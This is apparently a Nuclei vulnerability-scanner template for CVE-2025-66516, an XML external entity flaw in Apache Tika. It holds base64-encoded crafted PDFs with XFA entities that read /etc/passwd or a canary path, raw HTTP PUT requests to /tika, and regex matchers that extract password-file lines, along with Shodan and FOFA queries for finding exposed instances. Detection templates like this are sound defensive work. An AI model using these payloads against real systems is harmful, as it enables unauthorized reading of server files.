Apache Tika - XML External Entity Injection

id: CVE-2025-66516

info:
  name: Apache Tika - XML External Entity Injection
  author: MathematicianGoat
  severity: high
  description: |
    Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1), and tika-parsers (1.13-1.28.5) contain an XML External Entity injection caused by processing crafted XFA files inside PDFs, letting attackers perform XXE attacks remotely, exploit requires crafted PDF input.
  impact: |
    Attackers can exploit XXE to read local files or cause denial of service, potentially exposing sensitive information or disrupting service.
  remediation: |
    Upgrade tika-core to \u003E= 3.2.2 and ensure tika-pdf-module and tika-parsers are updated to latest versions.
  reference:
    - https://github.com/chasingimpact/CVE-2025-66516-Writeup-POC
    - https://nvd.nist.gov/vuln/detail/CVE-2025-66516
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 9.8
    cve-id: CVE-2025-66516
    epss-score: 0.01458
    epss-percentile: 0.80793
    cwe-id: CWE-611
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"Apache Tika"
    fofa-query: title="Apache Tika"
  tags: cve,cve2025,apache,tika,xxe,pdf,lfr

variables:
  passwd_payload: "JVBERi0xLjcKJeLjz9MKMSAwIG9iago8PCAvVHlwZSAvQ2F0YWxvZyAvUGFnZXMgMiAwIFIgL0Fjcm9Gb3JtIDUgMCBSID4+CmVuZG9iagoyIDAgb2JqCjw8IC9UeXBlIC9QYWdlcyAvS2lkcyBbMyAwIFJdIC9Db3VudCAxID4+CmVuZG9iagozIDAgb2JqCjw8IC9UeXBlIC9QYWdlIC9QYXJlbnQgMiAwIFIgL01lZGlhQm94IFswIDAgNjEyIDc5Ml0gL0NvbnRlbnRzIDQgMCBSID4+CmVuZG9iago0IDAgb2JqCjw8IC9MZW5ndGggMCA+PgpzdHJlYW0KZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8IC9GaWVsZHMgW10gL1hGQSA2IDAgUiAvTmVlZEFwcGVhcmFuY2VzIHRydWUgPj4KZW5kb2JqCjYgMCBvYmoKPDwgL0xlbmd0aCA3NTggPj4Kc3RyZWFtCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ij8+CjwhRE9DVFlQRSB4ZHA6eGRwIFsKICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPgpdPgo8eGRwOnhkcCB4bWxuczp4ZHA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGRwLyIgeG1sOmxhbmc9ImVuIj4KPGNvbmZpZyB4bWxucz0iaHR0cDovL3d3dy54ZmEub3JnL3NjaGVtYS94Y2kvMy4xLyI+CiAgPHByZXNlbnQ+PHBkZj48dmVyc2lvbj4xLjc8L3ZlcnNpb24+PC9wZGY+PC9wcmVzZW50Pgo8L2NvbmZpZz4KPHRlbXBsYXRlIHhtbG5zPSJodHRwOi8vd3d3LnhmYS5vcmcvc2NoZW1hL3hmYS10ZW1wbGF0ZS8zLjMvIj4KICA8c3ViZm9ybSBuYW1lPSJmb3JtMSIgbGF5b3V0PSJ0YiI+CiAgICA8cGFnZVNldD48cGFnZUFyZWE+PGNvbnRlbnRBcmVhLz48bWVkaXVtIHN0b2NrPSJsZXR0ZXIiLz48L3BhZ2VBcmVhPjwvcGFnZVNldD4KICAgIDxzdWJmb3JtPgogICAgICA8ZmllbGQgbmFtZT0iZGF0YSI+PHVpPjx0ZXh0RWRpdC8+PC91aT48dmFsdWU+PHRleHQ+Jnh4ZTs8L3RleHQ+PC92YWx1ZT48L2ZpZWxkPgogICAgPC9zdWJmb3JtPgogIDwvc3ViZm9ybT4KPC90ZW1wbGF0ZT4KPHhmYTpkYXRhc2V0cyB4bWxuczp4ZmE9Imh0dHA6Ly93d3cueGZhLm9yZy9zY2hlbWEveGZhLWRhdGEvMS4wLyI+CiAgPHhmYTpkYXRhPjxmb3JtMT48ZGF0YT4meHhlOzwvZGF0YT48L2Zvcm0xPjwveGZhOmRhdGE+CjwveGZhOmRhdGFzZXRzPgo8L3hkcDp4ZHA+CmVuZHN0cmVhbQplbmRvYmoKeHJlZgowIDcKMDAwMDAwMDAwMCA2NTUzNSBmIAowMDAwMDAwMDE2IDAwMDAwIG4gCjAwMDAwMDAwODIgMDAwMDAgbiAKMDAwMDAwMDE1MiAwMDAwMCBuIAowMDAwMDAwMjYyIDAwMDAwIG4gCjAwMDAwMDAzMjMgMDAwMDAgbiAKMDAwMDAwMDM5OSAwMDAwMCBuIAp0cmFpbGVyCjw8IC9TaXplIDcgL1Jvb3QgMSAwIFIgPj4Kc3RhcnR4cmVmCjEyOTUKJSVFT0YK"
  canary_payload: "JVBERi0xLjcKJeLjz9MKMSAwIG9iago8PCAvVHlwZSAvQ2F0YWxvZyAvUGFnZXMgMiAwIFIgL0Fjcm9Gb3JtIDUgMCBSID4+CmVuZG9iagoyIDAgb2JqCjw8IC9UeXBlIC9QYWdlcyAvS2lkcyBbMyAwIFJdIC9Db3VudCAxID4+CmVuZG9iagozIDAgb2JqCjw8IC9UeXBlIC9QYWdlIC9QYXJlbnQgMiAwIFIgL01lZGlhQm94IFswIDAgNjEyIDc5Ml0gL0NvbnRlbnRzIDQgMCBSID4+CmVuZG9iago0IDAgb2JqCjw8IC9MZW5ndGggMCA+PgpzdHJlYW0KZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8IC9GaWVsZHMgW10gL1hGQSA2IDAgUiAvTmVlZEFwcGVhcmFuY2VzIHRydWUgPj4KZW5kb2JqCjYgMCBvYmoKPDwgL0xlbmd0aCA3NzggPj4Kc3RyZWFtCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ij8+CjwhRE9DVFlQRSB4ZHA6eGRwIFsKICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL3RtcC94eGVfdGVzdF9ub25leGlzdGVudF8xMjM0NSI+Cl0+Cjx4ZHA6eGRwIHhtbG5zOnhkcD0iaHR0cDovL25zLmFkb2JlLmNvbS94ZHAvIiB4bWw6bGFuZz0iZW4iPgo8Y29uZmlnIHhtbG5zPSJodHRwOi8vd3d3LnhmYS5vcmcvc2NoZW1hL3hjaS8zLjEvIj4KICA8cHJlc2VudD48cGRmPjx2ZXJzaW9uPjEuNzwvdmVyc2lvbj48L3BkZj48L3ByZXNlbnQ+CjwvY29uZmlnPgo8dGVtcGxhdGUgeG1sbnM9Imh0dHA6Ly93d3cueGZhLm9yZy9zY2hlbWEveGZhLXRlbXBsYXRlLzMuMy8iPgogIDxzdWJmb3JtIG5hbWU9ImZvcm0xIiBsYXlvdXQ9InRiIj4KICAgIDxwYWdlU2V0PjxwYWdlQXJlYT48Y29udGVudEFyZWEvPjxtZWRpdW0gc3RvY2s9ImxldHRlciIvPjwvcGFnZUFyZWE+PC9wYWdlU2V0PgogICAgPHN1YmZvcm0+CiAgICAgIDxmaWVsZCBuYW1lPSJkYXRhIj48dWk+PHRleHRFZGl0Lz48L3VpPjx2YWx1ZT48dGV4dD4meHhlOzwvdGV4dD48L3ZhbHVlPjwvZmllbGQ+CiAgICA8L3N1YmZvcm0+CiAgPC9zdWJmb3JtPgo8L3RlbXBsYXRlPgo8eGZhOmRhdGFzZXRzIHhtbG5zOnhmYT0iaHR0cDovL3d3dy54ZmEub3JnL3NjaGVtYS94ZmEtZGF0YS8xLjAvIj4KICA8eGZhOmRhdGE+PGZvcm0xPjxkYXRhPiZ4eGU7PC9kYXRhPjwvZm9ybTE+PC94ZmE6ZGF0YT4KPC94ZmE6ZGF0YXNldHM+CjwveGRwOnhkcD4KZW5kc3RyZWFtCmVuZG9iagp4cmVmCjAgNwowMDAwMDAwMDAwIDY1NTM1IGYgCjAwMDAwMDAwMTYgMDAwMDAgbiAKMDAwMDAwMDA4MiAwMDAwMCBuIAowMDAwMDAwMTUyIDAwMDAwIG4gCjAwMDAwMDAyNjIgMDAwMDAgbiAKMDAwMDAwMDMyMyAwMDAwMCBuIAowMDAwMDAwMzk5IDAwMDAwIG4gCnRyYWlsZXIKPDwgL1NpemUgNyAvUm9vdCAxIDAgUiA+PgpzdGFydHhyZWYKMTMxNQolJUVPRgo="

http:
  - raw:
      - |
        PUT /tika HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/pdf

        {{base64_decode(passwd_payload)}}

      - |
        PUT /tika HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/pdf

        {{base64_decode(canary_payload)}}

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: regex
        part: body_1
        regex:
          - "root:.*:0:0:"

      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains_any(body_2, "FileNotFoundException", "No such file")'
        condition: and

    extractors:
      - type: regex
        part: body_1
        group: 1
        regex:
          - 'data:\s*(root:x:0:0:[^\n]+)'
# digest: 4b0a00483046022100f8ae1b411accd495b46b48f97a37e08867744e6086912094801475380243d5c1022100a2bf9560c1934913c7fe415468abeb3c07976dd3931f8704b31319b86be810e0:922c64590222798bb761d5b6d8e72950